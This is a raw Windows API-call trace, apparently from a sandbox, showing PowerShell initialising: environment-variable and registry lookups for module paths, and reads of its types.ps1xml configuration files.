	[0733.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.353] CoTaskMemFree (pv=0x2b17f0) 
	[0733.353] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.353] CoTaskMemFree (pv=0x2b17f0) 
	[0733.354] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.355] CoTaskMemFree (pv=0x2b17f0) 
	[0733.369] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.371] CoTaskMemFree (pv=0x2b17f0) 
	[0733.371] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.371] CoTaskMemFree (pv=0x2b17f0) 
	[0733.372] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.372] CoTaskMemFree (pv=0x2b17f0) 
	[0733.374] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.374] CoTaskMemFree (pv=0x2b17f0) 
	[0733.379] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.379] CoTaskMemFree (pv=0x2b17f0) 
	[0734.624] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0734.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.624] CoTaskMemFree (pv=0x2b17f0) 
	[0734.625] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0734.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.625] CoTaskMemFree (pv=0x2b17f0) 
	[0737.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0737.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0739.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.614] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0740.614] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0740.614] CoTaskMemFree (pv=0x2b17f0) 
	[0740.616] CoTaskMemAlloc (cb=0xcc) returned 0x1b745700
	[0740.616] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b745700, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0740.616] CoTaskMemFree (pv=0x1b745700) 
	[0740.616] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x30c) returned 0x0
	[0740.616] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d32c, lpData=0x0, lpcbData=0x14d328*=0x0 | out: lpType=0x14d32c*=0x2, lpData=0x0, lpcbData=0x14d328*=0x6c) returned 0x0
	[0740.616] CoTaskMemAlloc (cb=0x70) returned 0x2548b0
	[0740.616] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d2fc, lpData=0x2548b0, lpcbData=0x14d2f8*=0x6c | out: lpType=0x14d2fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14d2f8*=0x6c) returned 0x0
	[0740.617] CoTaskMemFree (pv=0x2548b0) 
	[0740.617] CoTaskMemAlloc (cb=0xcc) returned 0x1b745700
	[0740.617] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b745700, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0740.617] CoTaskMemFree (pv=0x1b745700) 
	[0740.617] CoTaskMemAlloc (cb=0xcc) returned 0x1b745700
	[0740.617] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b745700, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0740.617] CoTaskMemFree (pv=0x1b745700) 
	[0740.621] RegCloseKey (hKey=0x30c) returned 0x0
	[0740.621] CoTaskMemAlloc (cb=0xcc) returned 0x1b745700
	[0740.621] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b745700, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0740.621] CoTaskMemFree (pv=0x1b745700) 
	[0740.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x30c) returned 0x0
	[0740.621] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d32c, lpData=0x0, lpcbData=0x14d328*=0x0 | out: lpType=0x14d32c*=0x0, lpData=0x0, lpcbData=0x14d328*=0x0) returned 0x2
	[0740.621] RegCloseKey (hKey=0x30c) returned 0x0
	[0740.627] CoTaskMemAlloc (cb=0x20c) returned 0x2af430
	[0740.627] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2af430 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0740.628] CoTaskMemFree (pv=0x2af430) 
	[0740.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0740.630] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0740.640] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0740.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.640] CoTaskMemFree (pv=0x2b17f0) 
	[0740.642] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0740.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.643] CoTaskMemFree (pv=0x2b17f0) 
	[0740.646] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0740.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.646] CoTaskMemFree (pv=0x2b17f0) 
	[0740.646] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0740.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.646] CoTaskMemFree (pv=0x2b17f0) 
	[0740.648] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x314) returned 0x0
	[0740.649] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x14d1ac, lpData=0x0, lpcbData=0x14d1a8*=0x0 | out: lpType=0x14d1ac*=0x1, lpData=0x0, lpcbData=0x14d1a8*=0x74) returned 0x0
	[0740.649] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x14d11c, lpData=0x0, lpcbData=0x14d118*=0x0 | out: lpType=0x14d11c*=0x1, lpData=0x0, lpcbData=0x14d118*=0x74) returned 0x0
	[0740.649] CoTaskMemAlloc (cb=0x78) returned 0x2548b0
	[0740.649] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x14d0ec, lpData=0x2548b0, lpcbData=0x14d0e8*=0x74 | out: lpType=0x14d0ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d0e8*=0x74) returned 0x0
	[0740.649] CoTaskMemFree (pv=0x2548b0) 
	[0740.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0740.650] SetErrorMode (uMode=0x1) returned 0x1
	[0740.650] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d070 | out: lpFileInformation=0x14d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0740.650] SetErrorMode (uMode=0x1) returned 0x1
	[0740.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0740.651] SetErrorMode (uMode=0x1) returned 0x1
	[0740.651] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d070 | out: lpFileInformation=0x14d070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0740.651] SetErrorMode (uMode=0x1) returned 0x1
	[0740.652] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0740.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.652] CoTaskMemFree (pv=0x2b17f0) 
	[0742.156] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0742.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.156] CoTaskMemFree (pv=0x2b17f0) 
	[0742.157] GetACP () returned 0x4e4
	[0742.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0742.168] SetErrorMode (uMode=0x1) returned 0x1
	[0742.169] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0742.170] GetFileType (hFile=0x318) returned 0x1
	[0742.170] SetErrorMode (uMode=0x1) returned 0x1
	[0742.170] GetFileType (hFile=0x318) returned 0x1
	[0742.173] ReadFile (in: hFile=0x318, lpBuffer=0x2df6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2df6f60*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.176] ReadFile (in: hFile=0x318, lpBuffer=0x2df6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2df6f60*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.176] ReadFile (in: hFile=0x318, lpBuffer=0x2df6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2df6f60*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0742.177] ReadFile (in: hFile=0x318, lpBuffer=0x2df6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2df6f60*, lpNumberOfBytesRead=0x14cfa8*=0xcf3, lpOverlapped=0x0) returned 1
	[0742.177] ReadFile (in: hFile=0x318, lpBuffer=0x2df63bb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2df63bb*, lpNumberOfBytesRead=0x14cfa8*=0x0, lpOverlapped=0x0) returned 1
	[0742.177] ReadFile (in: hFile=0x318, lpBuffer=0x2df6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2df6f60*, lpNumberOfBytesRead=0x14cfa8*=0x0, lpOverlapped=0x0) returned 1
	[0742.179] CloseHandle (hObject=0x318) returned 1
	[0742.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0742.182] SetErrorMode (uMode=0x1) returned 0x1
	[0742.182] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf20 | out: lpFileInformation=0x14cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0742.182] SetErrorMode (uMode=0x1) returned 0x1
	[0742.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0742.184] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d008 | out: phkResult=0x14d008*=0x318) returned 0x0
	[0742.184] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf8c, lpData=0x0, lpcbData=0x14cf88*=0x0 | out: lpType=0x14cf8c*=0x1, lpData=0x0, lpcbData=0x14cf88*=0x56) returned 0x0
	[0742.184] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d2a0
	[0742.184] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf5c, lpData=0x1b73d2a0, lpcbData=0x14cf58*=0x56 | out: lpType=0x14cf5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cf58*=0x56) returned 0x0
	[0742.184] CoTaskMemFree (pv=0x1b73d2a0) 
	[0742.184] RegCloseKey (hKey=0x318) returned 0x0
	[0742.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0742.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0743.489] VirtualQuery (in: lpAddress=0x14bcf0, lpBuffer=0x14cbb0, dwLength=0x30 | out: lpBuffer=0x14cbb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0744.765] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0744.765] GetFileType (hFile=0x318) returned 0x1
	[0744.765] SetErrorMode (uMode=0x1) returned 0x1
	[0744.765] GetFileType (hFile=0x318) returned 0x1
	[0744.766] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.767] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.768] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.768] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.768] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.770] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.770] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.770] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.771] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.772] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
